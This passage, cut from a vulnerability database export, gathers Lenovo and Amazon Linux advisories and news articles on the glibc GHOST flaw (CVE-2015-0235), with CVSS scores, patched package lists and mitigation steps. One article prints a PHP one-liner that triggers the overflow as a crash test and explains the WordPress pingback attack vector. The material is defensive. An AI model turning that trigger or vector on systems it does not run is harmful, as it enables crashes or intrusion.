[CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (\"GHOST\")", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2016-07-22T00:00:00", "id": "LENOVO:PS500043-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ghost", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2023-02-08T17:21:58", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n<br/><h4>Special notes:</h4>\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235.\n\nFor 2014.09 Amazon Linux AMIs, <i>glibc-2.17-55.93.amzn1</i> addresses the CVE. Running <i>yum clean all</i> followed by <i>yum update glibc</i> will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs <a href=\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\">\"locked\"</a> to the 2014.03 repositories, the same <i>glibc-2.17-55.93.amzn1</i> addresses the CVE. Running <i>yum clean all</i> followed by <i>yum update glibc</i> will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs <a href=\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\">\"locked\"</a> to the 2013.09 repositories, <i>glibc-2.12-1.149.49.amzn1</i> addresses the CVE. 
Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run _yum clean all_ followed by _yum --releasever=2013.09 update glibc_ to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. 
On new instance launches, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 glibc-static-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-common-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 nscd-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-devel-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-utils-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-debuginfo-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-headers-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-debuginfo-common-2.17-55.93.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 glibc-utils-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 nscd-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-debuginfo-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-headers-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-debuginfo-common-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-common-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-static-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-devel-2.17-55.93.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>)\n", "cvss3": {}, "published": "2015-01-27T11:41:00", "type": "amazon", "title": "Critical: glibc", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-28T19:57:00", "id": "ALAS-2015-473", "href": "https://alas.aws.amazon.com/ALAS-2015-473.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T17:21:40", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory. (CVE-2015-0273)\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php55-gd-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-process-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-soap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-cli-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-imap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-devel-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-dba-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xml-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 
php55-mcrypt-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-recode-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-common-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-intl-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.22-1.98.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php55-5.5.22-1.98.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php55-pspell-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-dba-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xml-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-recode-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-process-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-imap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 
php55-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-soap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gd-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-cli-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-common-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-devel-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-intl-5.5.22-1.98.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>), [CVE-2015-0273](<https://access.redhat.com/security/cve/CVE-2015-0273>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>), [CVE-2015-0273](<https://vulners.com/cve/CVE-2015-0273>)\n", "cvss3": {}, "published": "2015-03-23T08:29:00", "type": "amazon", "title": "Critical: php55", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2015-03-23T08:54:00", "id": "ALAS-2015-494", "href": "https://alas.aws.amazon.com/ALAS-2015-494.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T17:21:41", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nUse after free vulnerability was reported in PHP DateTimeZone. (CVE-2015-0273)\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-common-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-soap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xml-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-cli-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-imap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-intl-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-process-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-devel-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 
php54-recode-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-dba-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-ldap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-gd-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.38-1.66.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php54-ldap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-dba-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-common-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-devel-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-recode-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-intl-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-imap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-gd-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-process-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-cli-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 
php54-pgsql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-soap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xml-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.38-1.66.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>), [CVE-2015-0273](<https://access.redhat.com/security/cve/CVE-2015-0273>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>), [CVE-2015-0273](<https://vulners.com/cve/CVE-2015-0273>)\n", "cvss3": {}, "published": "2015-03-13T10:00:00", "type": "amazon", "title": "Critical: php54", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2015-03-13T10:03:00", "id": "ALAS-2015-493", "href": "https://alas.aws.amazon.com/ALAS-2015-493.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:34", "description": "[](<https://4.bp.blogspot.com/-n9qRyLyEnTk/VMhH-B1pR3I/AAAAAAAAhoo/hhqRYQ4ynzs/s728/ghost-linux-security-vulnerability.png>)\n\nA highly critical vulnerability has been unearthed in the **GNU C Library (glibc)**, a widely used component of most Linux distributions, that could allow attackers to execute malicious code on servers and remotely gain control of Linux machines.\n\n \n\n\nThe vulnerability, dubbed \"**GHOST**\" and assigned _[CVE-2015-0235](<http://seclists.org/oss-sec/2015/q1/283>)_, was 
discovered and disclosed by the security researchers from Redwood Shores, California-based security firm Qualys on Tuesday.\n\n \n\n\n**CRITICAL AS HEARTBLEED AND SHELLSHOCK**\n\nGHOST is considered to be critical because hackers could exploit it to silently gain complete control of a targeted Linux system without having any prior knowledge of system credentials (i.e. administrative passwords). \n\n \n\n\nThe flaw represents an immense Internet threat, in some ways similar to the **[Heartbleed](<https://thehackernews.com/2014/04/heartbleed-bug-explained-10-most.html>)**, **[Shellshock](<https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html>)** and **[Poodle](<https://thehackernews.com/2014/10/poodle-ssl-30-attack-exploits-widely_14.html>)** bugs that came to light last year.\n\n \n\n\n**WHY GHOST?**\n\nThe vulnerability in the GNU C Library (glibc) is dubbed GHOST because it can be triggered by the library's _gethostbyname family of functions_. Glibc is a repository of open-source software written in the C and C++ coding languages that defines system calls.\n\n \n\n\nThe problem actually originates from a heap-based buffer overflow found in the **__nss_hostname_digits_dots()** function in glibc. This function is invoked in particular by the **gethostbyname()** and **gethostbyname2()** function calls.\n\n \n\n\nAccording to the researchers, a remote attacker able to make an application call either of these functions could exploit the vulnerability to execute arbitrary code with the permissions of the user running the application.\n\n \n\n\n**EXPLOIT CODE**\n\nIn an attempt to highlight the severity of the risk, security researchers were able to write proof-of-concept exploit code that is capable of carrying out a full-fledged remote code execution attack against the [Exim mail server](<http://exim.org/>). 
\n\n \n\n\nThe researchers\u2019 exploit was able to bypass all existing exploit protections available on both 32-bit and 64-bit systems, including position-independent executables (PIE), address space layout randomization (ASLR) and no-execute (NX) protections.\n\n \n\n\nUsing the exploit, an attacker is able to craft malicious emails that could automatically compromise a vulnerable server without the email even being opened, according to Amol Sarwate, director of engineering with Qualys.\n\n \n\n\nSo far, the company has not published the exploit code to the public, but eventually it plans to make the exploit available as a Metasploit module.\n\n \n\n\n**VERSIONS AFFECTED**\n\nThe vulnerability affects versions of glibc as far back as glibc-2.2, which was released in 2000.\n\n> \"Unfortunately, it was not recognized as a security threat; as a result, most stable and long-term-support distributions were left exposed (and still are): Debian 7 (wheezy), Red Hat Enterprise Linux 6 & 7, CentOS 6 & 7, Ubuntu 12.04, for example,\" researchers from Qualys said in an [advisory](<http://www.openwall.com/lists/oss-security/2015/01/27/9>) published Tuesday.\n\n**FIXES AVAILABLE FOR SOME LINUX DISTRIBUTIONS**\n\nHowever, major distributors of the Linux operating system, including **[Red Hat](<https://rhn.redhat.com/errata/RHSA-2015-0090.html>)**, **[Debian](<https://security-tracker.debian.org/tracker/CVE-2015-0235>)** and **[Ubuntu](<https://launchpad.net/ubuntu/+source/eglibc>)**, updated their software on Tuesday to thwart the serious cyber threat. After updating, the core services that link against glibc must be restarted, or the entire affected server rebooted, for the fix to take effect.\n\n \n\n\nRed Hat, the No. 
1 provider of Linux software to businesses, recommends its customers to update their systems _\"as soon as possible to mitigate any potential risk.\"_\n", "cvss3": {}, "published": "2015-01-27T21:17:00", "type": "thn", "title": "Critical GHOST vulnerability affects most Linux Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2016-08-04T08:10:47", "id": "THN:A649F4ABCE9B99052139693A13D95B14", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:33", "description": "[](<https://3.bp.blogspot.com/-4Dia-n2xwzc/VMtiJcqIwVI/AAAAAAAAhqc/bAafPBMQ_gw/s1600/ghost-glibc-vulnerabilitywordPress.jpg>)\n\nAfter the disclosure of extremely critical **[GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) in the GNU C library (glibc)** \u2014 a widely used component of most Linux distributions, security researchers have discovered that PHP applications, including the _**[WordPress](<https://thehackernews.com/search/label/WordPress>) **_Content Management System (CMS), could also be affected by the bug.\n\n \n\n\n\"**GHOST**\" is a serious vulnerability (_CVE-2015-0235_), announced this week by the researchers of California-based security firm Qualys, that involves a heap-based buffer overflow in the glibc function name - \"GetHOSTbyname().\" Researchers said the vulnerability has been present in the glibc code since 2000.\n\n \n\n\nThough the major Linux distributors such as **Red Hat**, **Debian** and** Ubuntu**, have already updated their software against the flaw, GHOST could be used by hackers against only a handful of applications currently to remotely run executable code and silently gain control of a Linux server. 
\n\n \n\n\nAs we explained in our previous article, the heap-based buffer overflow was found in the __nss_hostname_digits_dots() function, which is used in particular by the **gethostbyname()** and **gethostbyname2()** glibc function calls. \n\n \n\n\nSince PHP applications including WordPress also use the **_gethostbyname() function wrapper_**, the chance of exposure to the critical vulnerability becomes higher even after many Linux distributions issued fixes.\n\n \n\n\n**GHOST - BIG ISSUE FOR WORDPRESS**\n\nAccording to Sucuri researcher Marc-Alexandre Montpas, the GHOST vulnerability could be a big issue for the WordPress CMS, as it uses the **wp_http_validate_url()** function to validate every pingback post URL.\n\n> \"_...And it does so by using gethostbyname(),_\" wrote Montpas in an [advisory](<http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html>) published Wednesday. \"_So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server._\"\n\nThe vulnerability affects all versions of glibc up to and including glibc-2.17. It was patched in glibc-2.18 in May 2013, but the fix was not marked as a security vulnerability, so it did not make it into many common Linux distributions like Red Hat and Ubuntu.\n\n \n\n\n**HOW TO CHECK YOUR SYSTEM AGAINST THE GHOST FLAW**\n\n> _\"This is a very critical vulnerability and should be treated as such,\"_ Montpas said. _\"If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away.\"_\n\nSucuri also provided the following test PHP code, which an admin can run on their server terminal. 
If the code returns a segmentation fault, then your Linux server is vulnerable to the GHOST vulnerability.\n\n> _php -r '$e=\"0\";for($i=0;$i<2500;$i++){$e=\"0$e\";} gethostbyname($e);'_\n> _Segmentation fault_\n\n**HOW TO PROTECT**\n\nUntil now, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released software updates. Users of the above Linux distributions are recommended to patch their systems, followed by a system reboot, as soon as possible. \n\n * **Disable XML-RPC**\nIf you don\u2019t want to use the XML-RPC process, it is possible to disable it altogether. There are even [WordPress plugins](<https://wordpress.org/plugins/prevent-xmlrpc/>) that will totally disable the XML-RPC process. \n\n\n * **Disable Pingback Requests**\nYou may also disable the pingback feature by adding the following code to your **functions.php file**: \n\n\n> _add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } );_\n", "cvss3": {}, "published": "2015-01-29T23:53:00", "type": "thn", "title": "GHOST glibc Vulnerability Affects WordPress and PHP applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-30T10:53:39", "id": "THN:3DD8F9ADFFEB290F33825414D41B0F41", "href": "https://thehackernews.com/2015/01/ghost-linux-security-vulnerability_29.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:54", "description": "[](<https://3.bp.blogspot.com/-_4EpHCqniVA/VsQtYB5WSwI/AAAAAAAAmuc/xFGkZE8C85Q/s1600/glibc-linux-flaw.png>)\n\nA highly critical vulnerability has been uncovered in the **GNU C Library (glibc)**, a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.\n\n \n\n\nJust clicking on a link or connecting to a server can result in remote code 
execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and more.\n\n \n\n\nThe vulnerability is similar to last year's [GHOST vulnerability](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>) (CVE-2015-0235) that left countless machines vulnerable to _remote code execution (RCE) attacks_, representing a major Internet threat.\n\n \n\n\nThe GNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.\n\n \n\n\nThe recent flaw, which is indexed as _CVE-2015-7547_, is a **stack-based buffer overflow** vulnerability in glibc's DNS client-side resolver, which is used to translate human-readable domain names, like google.com, into a network IP address.\n\n \n\n\nThe buffer overflow flaw is triggered when the _getaddrinfo() library function_ that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.\n\n \n\n\n### How Does the Flaw Work?\n\n \n\n\nThe flaw can be exploited when an affected device or app makes queries to a malicious DNS server that returns too much information in 